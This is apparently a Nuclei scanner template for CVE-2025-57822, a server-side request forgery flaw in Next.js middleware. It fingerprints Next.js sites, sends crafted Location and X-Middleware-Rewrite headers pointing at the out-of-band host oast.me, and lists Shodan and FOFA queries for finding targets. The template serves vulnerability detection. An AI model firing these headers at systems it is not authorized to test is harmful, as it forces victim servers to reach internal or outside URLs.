id: CVE-2025-57822

info:
  name: Next.js Middleware - Server-Side Request Forgery
  author: prdngr,nicolas-latacora
  severity: medium
  description: |
    In Next.js prior to versions 14.2.32 and 15.4.7, when request headers were insecurely passed to NextResponse.next(), an attacker could exploit this behavior to perform Server-Side Request Forgery (SSRF) attacks.
  impact: |
    Attackers can manipulate request headers to perform SSRF attacks by forcing the server to make requests to arbitrary internal or external URLs when middleware passes headers unsafely.
  remediation: |
    Upgrade Next.js to version 14.2.32, 15.4.7, or later, which properly validates and sanitizes request headers in NextResponse.next().
  reference:
    - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f
    - https://vercel.com/changelog/cve-2025-57822
    - https://nvd.nist.gov/vuln/detail/CVE-2025-57822
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-57822
    epss-score: 0.07815
    epss-percentile: 0.92116
    cwe-id: CWE-918
  metadata:
    verified: true
    vendor: vercel
    product: next.js
    shodan-query:
      - cpe:"cpe:2.3:a:zeit:next.js"
      - http.html:"/_next/static"
    fofa-query:
      - body="/_next/static"
  tags: cve,cve2025,ssrf,nextjs,oast,oob,vuln

variables:
  cache-buster: "{{rand_text_alpha(10)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3

    matchers:
      - type: word
        part: body
        words:
          - "_next/static"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?cb={{cache-buster}}"

    headers:
      Location: "https://oast.me"
      X-Middleware-Rewrite: "https://oast.me"

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
# digest: 4a0a004730450221008482c26cc1717442d1cf376d309e3b7e4675cf2a42eefb59173d87073b6fdd84022004e2b3d239e9ce63c8b87751761f08cb4630e5416b2bcf621bbcd8b889bf7cb5:922c64590222798bb761d5b6d8e72950